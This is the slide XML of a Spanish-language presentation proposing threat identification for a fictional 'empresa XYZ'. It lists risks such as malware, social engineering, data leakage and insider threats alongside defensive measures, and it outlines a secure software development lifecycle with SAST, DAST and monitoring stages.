              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9D10B0-156B-F723-7C0B-50ACF81B0391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5903349" y="1585343"/>
            <a:ext cx="5019243" cy="424731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2.    Malware y virus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software malicioso puede infectar las estaciones de trabajo y servidores.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software antivirus actualizado y falta de concienciación sobre seguridad informática para los empleados.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 Medidas de seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: utilizar software antivirus actualizado, implementar firewalls, y concienciar al personal sobre la prevención de malware y phishing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA835C64-2E4E-E3E8-6E4F-C4CD612247E8}"/>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8981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4D37F-BD8B-1D21-B403-4A9112C5B9F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27BFA44-9040-4042-1501-721A5CE3427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69F17C9-5A81-AEDD-E8CE-6020EDDB161E}"/>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Identificación de Amenazas de empresa XYZ: Propuesta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8625A3B-9EF1-32AA-F982-B13AB1E8142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CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E8452D-3014-241A-0543-1D9A71E40F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544952" y="1542479"/>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3.    Ataques de ingeniería social</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los atacantes pueden engañar a los empleados para obtener información confidencial.</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conciencia y capacitación en seguridad para el personal.</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proporcionar capacitación en concienciación sobre seguridad informática y establecer políticas de divulgación de información sensible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CuadroTexto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF1B1911-EDB7-FF5C-80CA-E7E49F03359F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817624" y="1542479"/>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4.    Fuga de datos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la información confidencial de los clientes podría filtrarse o perderse.</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insuficientes medidas de cifrado y control de acceso.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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implementar cifrado de datos en reposo y en tránsito, establecer políticas de acceso basadas en roles y realizar auditorías regulares.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59614AED-A49E-9000-6C9B-E50EA182022C}"/>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8037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04F76F0-A5FD-9545-1C53-160C5798E325}"/>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57ED6745-CBB0-0D23-52B6-52D5A35C8E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5384373"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DEEE0CD-6C84-6DA7-034C-78634FA56373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5907024" y="2703486"/>
            <a:ext cx="6217920" cy="150810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1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTRODUCCIÓN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00FF009C-FD38-DE3E-26C6-034F13160A46}"/>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279361" y="88094"/>
            <a:ext cx="2231136" cy="871728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DE4E37-AA9E-77B5-F0C0-791F9E26259F}"/>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239177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60F49-277D-B51F-D682-A6832F724C4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8F1EA1A5-7CCA-62BF-DAD1-FB8BDFC245E1}"/>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ADEA3EC-7A42-0674-4BF0-F68132D1FAB1}"/>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Identificación de Amenazas de empresa XYZ: Propuesta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01E77EC5-3FA7-B516-93B1-B9DD83F57AD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AE7329F2-D53E-8445-AC38-277DE1E54444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544951" y="1718312"/>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5.    Fallas en la infraestructura</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puede haber fallos de hardware o software que causen interrupciones en el servicio.</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redundancia y planes de recuperación ante desastres.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>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implementar redundancia en servidores críticos, realizar copias de seguridad y desarrollar un plan de recuperación ante desastres.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F08055-5234-B7C7-84E3-20D69C548D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817623" y="1718312"/>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6.    Actualizaciones no aplicadas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la falta de actualizaciones de seguridad puede dejar sistemas desprotegidos.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un proceso de gestión de parches efectivo.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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establecer un proceso de gestión de parches que incluya la aplicación regular de actualizaciones críticas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A94CB8-E0E1-AFE7-2C1B-F32E70B29DAF}"/>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574855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8EE06-CC54-5340-EBDC-2577F24C594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7E513D19-8C5F-ECD3-541B-6681E21AE785}"/>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D8F3EE9-5805-91F3-62BA-CCC2ECBCC4E8}"/>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Identificación de Amenazas de empresa XYZ: Propuesta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FB006A-A91E-03CD-0D5E-043DA95F3CD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CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A84F49-B387-17B9-2178-DE4D74E2F9DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523520" y="1542479"/>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7.    Riesgos físicos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desastres naturales, incendios o robos pueden afectar la infraestructura física.</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medidas de seguridad física.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>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implementar sistemas de alarma, respaldo de datos en ubicaciones fuera del sitio y asegurar adecuadamente las instalaciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CuadroTexto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B60C6F4E-2D18-4BE8-88CA-D57E45B4B1AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796192" y="1542479"/>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8.    Amenazas internas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>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personal o contratistas deshonestos pueden representar un riesgo.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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supervisión y control de acceso inadecuado.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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establecer políticas de acceso basadas en roles y realizar auditorías de actividad de usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AD67A7F-F79B-609C-E63F-1EE51C1A880B}"/>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439015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234F74A-EAEE-A902-B32A-0F0373AC8253}"/>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D98EDEDD-5625-D34A-D389-142712F467D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7125"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320E28C-680D-F4CC-B0AF-8EF6C22DD0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258892" y="2135628"/>
            <a:ext cx="5951410" cy="3170099"/>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4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CICLO DE VIDA DE DESARROLLO DE SOFTWARE SEGURO, S-SDLC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284664E6-EA81-B2C7-AE98-77FB92FF6ACC}"/>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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F57F1FA0-0775-D8B8-8872-1CC0218CC764}"/>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345692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2FF9F-5225-6C5D-77C9-951D58D63CD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61A8D5D-58DC-3131-437B-71540BA9E17C}"/>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7C07577-46C0-0396-A4FC-29B3150705CB}"/>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Ciclo de vida tradicional de desarrollo de software, S-SDLC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58640F0-FF82-2852-3471-EDC3B522AFA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E87EEC7D-AC65-6C25-BF28-18A4E7E4D8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996812" y="1843950"/>
            <a:ext cx="5750184" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Como adaptar el control de seguridad de forma óptima al desarrollo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Análisis de requisitos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Requisitos de seguridad.</a:t>
            </a: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Diseño</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Revisión.</a:t>
            </a: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Desarrollo. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auditoría de código SAST.</a:t>
            </a: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Pruebas. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auditoría de aplicación DAST.</a:t>
            </a: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Mantenimiento. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Monitorización.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" b="1" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2">
            <a:hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773A48C3-0799-E309-CBB0-D1420CA01ABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6765875" y="1581090"/>
            <a:ext cx="4280077" cy="3561024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8881F085-B44F-C10D-E5A1-8101A5A891E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1781936" y="4618894"/>
            <a:ext cx="3570335" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Desarrollo de software seguir S-SDLC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC8A706-FC5B-9F40-FD33-8E5F94574C26}"/>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687926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9334F-E92A-7442-4CB7-6A9DAED1AB2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CEAA0C1-77CD-31D4-679F-1EFEAEA9479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FD00E1E-6F2F-D16C-F2B4-06B7D612A194}"/>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CAB25F11-3254-3EFC-7A4C-FA428E33899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4" name="Picture 4" descr="Seven Touchpoints for Software Security">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B62170-328B-F4AE-18A0-886665866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98" y="2317970"/>
            <a:ext cx="4002365" cy="23857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iclo de vida de desarrollo seguro simplificado">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8A844C-AE1B-9854-4069-14F58C82B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264" y="2604381"/>
            <a:ext cx="5449029" cy="149859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7A1C7E32-744A-1C89-D902-6AF74DF64B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492924" y="1317029"/>
            <a:ext cx="4778829" cy="869790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
